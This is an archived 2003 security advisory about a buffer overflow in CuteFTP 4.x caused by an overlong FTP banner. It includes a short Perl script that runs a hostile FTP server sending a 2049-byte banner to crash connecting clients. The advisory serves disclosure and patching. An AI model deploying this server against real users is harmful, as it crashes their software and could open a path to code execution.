TUCoPS :: Windows Net Apps :: WIN5906.HTM

CuteFTP buffer overflow in ftp banner sent by server
5th Jan 2003 [SBWID-5906]
COMMAND

	CuteFTP buffer overflow in ftp banner sent by server

SYSTEMS AFFECTED

	CuteFTP versions: v.4.*

PROBLEM

	In D4rkGr3y of Damage Hacking  Group  security  [http://www.dhgroup.org]
	advisory :
	    
	It's possible to crash CuteFTP (and run shellcode(?))  by  sending  long
	(>2048b) ftp-banner to it. As u understand, this problem could  be  used
	by FTP server.
	
	 #Exploit#
	
	#!/usr/bin/perl
	######################################################
	#Here is an example of ftp-server. It will freeze each
	#CuteFTP-user, that try to connect to it.
	#######################################################
	use IO::Socket;
	$port = "21";
	$data = "a";
	$num = "2049";
	$buf .= $data x $num;
	$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
	or die "Couldn't create tcp-server.\n";
	while ($client = $server->accept()) {
	 print "Client connected.\n";
	 print "Attacking...";
	 print $client "$buf";
	 print "OK\n";
	 close($client);
	}
	#EOF
	

SOLUTION

	Download new verion from www.globalscape.com.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH